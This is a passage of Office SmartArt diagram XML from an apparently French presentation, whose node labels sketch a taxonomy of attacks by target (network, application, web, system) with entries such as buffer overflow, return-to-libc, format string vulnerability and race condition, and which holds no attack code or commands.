    <dgm:cxn modelId="{BBE292E6-F67F-4925-BF0B-FABA07676CF4}" type="presParOf" srcId="{B9C424BC-FF11-43F9-B87A-69F7023A8785}" destId="{60E21240-EDE5-468F-B1CE-20CBA08E568B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{F445FFDC-9728-4EA4-A46C-2E6C512D40EA}" type="presParOf" srcId="{B9C424BC-FF11-43F9-B87A-69F7023A8785}" destId="{2A8C9972-872A-4581-9F65-6BDBE621502A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{51B9D093-AEAF-4EE9-8C6A-D51D08078BC0}" type="presParOf" srcId="{2A8C9972-872A-4581-9F65-6BDBE621502A}" destId="{9C98F520-D0CA-4859-96D6-BB599C518A5E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{D84BC985-D022-47A0-8AE1-0FD9F39C7962}" type="presParOf" srcId="{9C98F520-D0CA-4859-96D6-BB599C518A5E}" destId="{323E92C9-1061-4D19-A1B4-78A7C0974721}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{876DB0CE-2FD8-43AE-A107-5E62F8123496}" type="presParOf" srcId="{2A8C9972-872A-4581-9F65-6BDBE621502A}" destId="{C6B05952-2CBC-47DF-85EB-1CEB9089FD7A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{AB0FF1F1-881A-4CDF-A41B-7D56F22AC245}" type="presParOf" srcId="{C6B05952-2CBC-47DF-85EB-1CEB9089FD7A}" destId="{39B833C0-8DAC-4292-B68F-828ACA83B0B2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{B1E9F420-CAC1-45D9-AEEC-939D82212E07}" type="presParOf" srcId="{C6B05952-2CBC-47DF-85EB-1CEB9089FD7A}" destId="{9B7FEABE-852D-4B7A-B0B1-53608FD9957D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{EE3B8BDD-030C-4FB4-984A-BE6C338B2332}" type="presParOf" srcId="{2A8C9972-872A-4581-9F65-6BDBE621502A}" destId="{72D05CAE-349D-4513-ADF1-0877ED89C006}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{8A7763A8-2F2F-4274-B44F-64B253A8575B}" type="presParOf" srcId="{72D05CAE-349D-4513-ADF1-0877ED89C006}" destId="{3B69F59A-3401-457B-8C4B-BA8EE2573FAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{C507BD71-A8F1-4056-B75B-67E74638EC8A}" type="presParOf" srcId="{2A8C9972-872A-4581-9F65-6BDBE621502A}" destId="{6DDE658F-FAFB-4728-AE59-F8F4704B72F4}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{1CC16CA7-FD74-4D85-B6B8-7E674493F3B5}" type="presParOf" srcId="{6DDE658F-FAFB-4728-AE59-F8F4704B72F4}" destId="{4E21182C-2A07-43D8-BF24-9FC007E0A7DD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{94EDF290-B0FA-442D-B25F-BA677536F63A}" type="presParOf" srcId="{6DDE658F-FAFB-4728-AE59-F8F4704B72F4}" destId="{E6498EB3-5D97-4315-8776-D9F744EDB3EA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{7AFA9084-69A9-4284-B7F0-CA0C71A683FF}" type="presParOf" srcId="{06D52A4F-D497-481E-A0D7-1AD342A881BF}" destId="{800C0953-6094-4FFF-AE03-4C61A5DA815B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{C59C0A6E-13E3-4C7F-9B65-6D8DE6628A5D}" type="presParOf" srcId="{800C0953-6094-4FFF-AE03-4C61A5DA815B}" destId="{972DE7E3-DF64-4150-B8EC-1C8E819945D6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{34F4C4B4-D52A-4DB5-94CB-8189F0433048}" type="presParOf" srcId="{06D52A4F-D497-481E-A0D7-1AD342A881BF}" destId="{A723D8CC-731E-418C-9278-CC1A041C8C5D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{F5B3B362-F2C9-47F1-B0B1-E3AD6EF30ACB}" type="presParOf" srcId="{A723D8CC-731E-418C-9278-CC1A041C8C5D}" destId="{801626B0-1DDD-43D6-82B8-A1A7985583FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{D840F7FA-AB8E-44B3-8605-1131B4ED2C8C}" type="presParOf" srcId="{A723D8CC-731E-418C-9278-CC1A041C8C5D}" destId="{0F54B708-7505-4546-ADFE-B8B923F89349}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{49D15895-BEDF-4A41-AA40-DF0A724ABF8A}" type="presParOf" srcId="{0F54B708-7505-4546-ADFE-B8B923F89349}" destId="{0FB08058-D565-45FF-A46B-1F12D295D485}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{8D73D4CF-C55D-483E-9584-28C209683FF0}" type="presParOf" srcId="{0FB08058-D565-45FF-A46B-1F12D295D485}" destId="{8D8C95C1-77F1-47F9-AFBF-6B6929575789}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{CE40D2AD-D16B-4FF9-BBA8-495E7F22C270}" type="presParOf" srcId="{0F54B708-7505-4546-ADFE-B8B923F89349}" destId="{2A9A116F-0FEC-4E4C-8DD4-C79278D9B4B5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{1E1C4237-D3C2-4730-B818-028B39325F42}" type="presParOf" srcId="{2A9A116F-0FEC-4E4C-8DD4-C79278D9B4B5}" destId="{72AE7ECC-E249-47FC-B67B-69C5DD38F331}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{03CA9570-E72C-4792-90EF-D8A50E9E33D7}" type="presParOf" srcId="{2A9A116F-0FEC-4E4C-8DD4-C79278D9B4B5}" destId="{A2D4D347-7120-47D1-8952-1F5AB6DCB7FF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{FB7BA133-4315-473C-88FC-BA24A58854ED}" type="presParOf" srcId="{0F54B708-7505-4546-ADFE-B8B923F89349}" destId="{F78E98D0-9AEA-461A-B576-E0E86737B03B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{0A86AFF9-4F2E-4877-9882-94229CD7E212}" type="presParOf" srcId="{F78E98D0-9AEA-461A-B576-E0E86737B03B}" destId="{313FAE70-2D2D-4402-AF76-9CB968DC3217}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{F9A53390-0BD2-4330-BF53-AD1A9263EBE9}" type="presParOf" srcId="{0F54B708-7505-4546-ADFE-B8B923F89349}" destId="{8B5DB158-9EBB-4787-907D-12D451FE6D46}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{ED007A69-6B42-4408-9143-4D8ED75FEBE8}" type="presParOf" srcId="{8B5DB158-9EBB-4787-907D-12D451FE6D46}" destId="{87971206-1DAA-4D32-9AA8-FFE6B5435848}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{B569A8FE-DA0D-4E43-B62D-44424DD3F495}" type="presParOf" srcId="{8B5DB158-9EBB-4787-907D-12D451FE6D46}" destId="{0B008FCA-ABEC-4BE0-B437-7478E6B8FB9F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{37CDFD49-AEF1-41D4-A679-DFFE087FEBA6}" type="presParOf" srcId="{06D52A4F-D497-481E-A0D7-1AD342A881BF}" destId="{FC45DACC-9997-4FA2-A187-A38DE77EBC39}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{876A6CE8-D534-4616-A6A3-702B6F30ABF0}" type="presParOf" srcId="{FC45DACC-9997-4FA2-A187-A38DE77EBC39}" destId="{E57FBB68-EAC8-4FCA-B9A8-38DD62F630CF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{3D844717-2846-4188-B6CA-0AB23AE5AE30}" type="presParOf" srcId="{06D52A4F-D497-481E-A0D7-1AD342A881BF}" destId="{02E02562-AD91-4C52-93E1-CC6F3AA07384}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{AB946D91-5DEF-41E4-B5DA-592838B92FED}" type="presParOf" srcId="{02E02562-AD91-4C52-93E1-CC6F3AA07384}" destId="{0C925222-85D9-4FA0-970F-FA2CE89785D6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{235BDE43-BF8B-40AD-BF67-FFE247392104}" type="presParOf" srcId="{02E02562-AD91-4C52-93E1-CC6F3AA07384}" destId="{CF5FE2C8-8F58-41E7-AFA5-3F46F7AA2E65}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{063F4EB8-9A0A-4381-A732-C02F2EC031C5}" type="presParOf" srcId="{CF5FE2C8-8F58-41E7-AFA5-3F46F7AA2E65}" destId="{8EC413DA-39B4-4769-9786-DC6FE75DE4CA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{4B0A7779-A4ED-428E-B5E1-C4AB7B1DC1BF}" type="presParOf" srcId="{8EC413DA-39B4-4769-9786-DC6FE75DE4CA}" destId="{DF05779C-9D28-4122-BB8F-44B122396B4F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{7FFD8EEC-D687-4271-8CAE-0B32BDD339EE}" type="presParOf" srcId="{CF5FE2C8-8F58-41E7-AFA5-3F46F7AA2E65}" destId="{36FBC276-2A8B-4B52-AAC9-8D44A12A1FB3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{494FE781-E465-4232-95F3-F9034FCC8B46}" type="presParOf" srcId="{36FBC276-2A8B-4B52-AAC9-8D44A12A1FB3}" destId="{92DD9F99-3006-47F7-8658-24C9E55E3B23}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{17D2DA1A-F9F8-4383-BE9A-5CDC00DB480E}" type="presParOf" srcId="{36FBC276-2A8B-4B52-AAC9-8D44A12A1FB3}" destId="{2B0A9666-FFE0-40D8-8EA8-1601075BE135}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{67D76207-D76D-4F74-925B-66D08379813F}" type="presParOf" srcId="{CF5FE2C8-8F58-41E7-AFA5-3F46F7AA2E65}" destId="{E6197FF0-0467-4B9F-A919-546CDB6A7B14}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{4028F0BA-72AD-4C39-84C2-803AF8E5485A}" type="presParOf" srcId="{E6197FF0-0467-4B9F-A919-546CDB6A7B14}" destId="{DBBE77A5-DA5A-47FA-ABCB-65853260C599}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{AA26A3A2-888B-4C90-92AF-B2F429A88107}" type="presParOf" srcId="{CF5FE2C8-8F58-41E7-AFA5-3F46F7AA2E65}" destId="{6D72462A-0617-45FC-ACE0-62B39A4883AA}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{E7474589-42FD-4996-9024-1D101FF62D56}" type="presParOf" srcId="{6D72462A-0617-45FC-ACE0-62B39A4883AA}" destId="{0F90E095-8BDC-4797-B045-C3AF1D09BB40}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{71C7618E-BF93-415B-A331-C6AEEFC4231A}" type="presParOf" srcId="{6D72462A-0617-45FC-ACE0-62B39A4883AA}" destId="{4CFE0EA2-015C-4A4A-B756-32647036E1ED}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{1A7AF950-7FF4-492C-8AEE-8F2B2561C576}" type="presParOf" srcId="{CF5FE2C8-8F58-41E7-AFA5-3F46F7AA2E65}" destId="{56FDB133-67C4-4FA7-BCED-E7B54769BA1B}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{EED97651-F292-4B34-8E47-4929F48E1C90}" type="presParOf" srcId="{56FDB133-67C4-4FA7-BCED-E7B54769BA1B}" destId="{D8A00C2F-2B81-4C13-B6CD-F76D641320B5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{5961B631-6869-41FD-A6AD-4D3503105BF8}" type="presParOf" srcId="{CF5FE2C8-8F58-41E7-AFA5-3F46F7AA2E65}" destId="{FC98F38A-BBEF-438E-B611-3C4461EB3719}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{15108059-6E39-4CC6-B81A-881BAB005866}" type="presParOf" srcId="{FC98F38A-BBEF-438E-B611-3C4461EB3719}" destId="{7257408E-88DC-4C76-9EF9-1749F1553028}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{AD9E94D3-662A-474D-8646-5C4DD601904C}" type="presParOf" srcId="{FC98F38A-BBEF-438E-B611-3C4461EB3719}" destId="{614AA72B-357E-4699-8DFA-EFB9334FC783}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{0E14A3DB-E30A-41F2-84C2-8D7A840F0018}" type="presParOf" srcId="{CF5FE2C8-8F58-41E7-AFA5-3F46F7AA2E65}" destId="{0B5D546A-71C0-4A10-AC0E-A0ABF8684D83}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{F64C1221-DA8E-499B-9191-D5DA96135056}" type="presParOf" srcId="{0B5D546A-71C0-4A10-AC0E-A0ABF8684D83}" destId="{59938ABC-3625-4917-B209-626549227B0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{38CD6640-3A25-48F9-8032-1BE26DED5C32}" type="presParOf" srcId="{CF5FE2C8-8F58-41E7-AFA5-3F46F7AA2E65}" destId="{19578491-A55E-4F6A-86F5-039E41E9C154}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{A3355614-29E9-4079-AE0D-E48129885DF8}" type="presParOf" srcId="{19578491-A55E-4F6A-86F5-039E41E9C154}" destId="{CBF7161E-682D-4DD6-A55F-A08867982CA6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{0FE8DF06-8875-4A41-BAF6-0A3005457831}" type="presParOf" srcId="{19578491-A55E-4F6A-86F5-039E41E9C154}" destId="{4FDD8765-A721-4FF2-BA18-3F791536E5B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F46A95F-FF67-4FC1-8019-487431071418}"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2FABA74E-2A77-4C7A-81EC-90784E484613}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Les attaques selon la  cible</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07A0FC09-2506-40A7-8630-D6AB5A72356F}" type="parTrans" cxnId="{C6A4752A-28C9-4970-AE6B-A72625874301}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{106BA05A-9C0B-4B8A-94AA-747AA4B0CC53}" type="sibTrans" cxnId="{C6A4752A-28C9-4970-AE6B-A72625874301}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0053A641-47A3-4294-8F48-19031BECE0A2}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Les attaques réseaux</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9FE2946B-9925-4626-84D1-8A6C8D9C7ACA}" type="parTrans" cxnId="{0C94D2E2-9BEF-4945-B416-ECFD9B3FEA24}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{173BE827-78F6-4A6F-86CF-48197712F8CD}" type="sibTrans" cxnId="{0C94D2E2-9BEF-4945-B416-ECFD9B3FEA24}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{40E52624-FC92-4C7E-84EF-EC82BD596B33}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Les attaques applicatives</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7873783-0C32-4A6B-B594-7FD03A983D14}" type="parTrans" cxnId="{300904F4-3FE6-46D5-B250-647A92ABDEBF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08F7A4F9-CFD8-4230-90C5-FBB6925EDA03}" type="sibTrans" cxnId="{300904F4-3FE6-46D5-B250-647A92ABDEBF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A97440A1-BD19-41F3-968C-DBD7BB990080}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Les attaques web</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2CF4A29F-3345-4F31-933E-6C28DBBFA638}" type="parTrans" cxnId="{6712D0C5-CFD8-49E7-A605-DEF16AFEFFBF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F169F87F-B398-4103-B25E-8A9E445FA3F8}" type="sibTrans" cxnId="{6712D0C5-CFD8-49E7-A605-DEF16AFEFFBF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3B2B9533-E7F8-4134-93F2-9A61A0852F7D}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Les attaques systèmes</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4FAC373D-EA01-45B0-8465-228A9C5CAD3E}" type="parTrans" cxnId="{2CB0BC4B-FD61-4187-B5B6-25E97A38086C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41FA5C81-EB68-408A-8243-9412F5C15CED}" type="sibTrans" cxnId="{2CB0BC4B-FD61-4187-B5B6-25E97A38086C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAEF9B93-102E-4583-8870-CCA3EE041A6B}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Buffer overflow</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAC337A2-96DC-428E-AEE2-B3CFE70BDA92}" type="parTrans" cxnId="{84D97D87-C7C3-47D2-A6A8-13274385B2E8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AECD80FA-DB3E-4FF7-844E-809F46C3FCF6}" type="sibTrans" cxnId="{84D97D87-C7C3-47D2-A6A8-13274385B2E8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A01C866-3957-4004-AE52-56CB4C005A08}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Return to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
            <a:t>libc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
            <a:t>Attack</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{357960A4-91BE-4E8F-9A2B-F9F4DE4C4E6D}" type="parTrans" cxnId="{8CFC3AFB-2E63-4AC0-B454-7D71A97CAA25}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73BDF272-C1D0-4A38-AB49-EC46DC7C2636}" type="sibTrans" cxnId="{8CFC3AFB-2E63-4AC0-B454-7D71A97CAA25}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{278400EB-5301-4B12-B50F-FB9674404DBC}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Format String </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
            <a:t>vulnerability</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{517AEE69-2384-4D30-BADD-6370CA8D4F26}" type="parTrans" cxnId="{D3B54913-6BEC-4415-A4E9-67BCE6F07BCB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BA064C1-CC3C-4234-BA53-E3F3BDDE5597}" type="sibTrans" cxnId="{D3B54913-6BEC-4415-A4E9-67BCE6F07BCB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1655CDA-F67F-4BA5-ABF6-BEBC7673F31E}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Race condition</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5F544288-29BA-47DB-8C99-1682CF83CF35}" type="parTrans" cxnId="{1C7ECB22-4C75-4D40-9AC3-AED9E2DFC951}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7D53D9F9-E75D-400C-A4FD-35D53FE93E4A}" type="sibTrans" cxnId="{1C7ECB22-4C75-4D40-9AC3-AED9E2DFC951}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
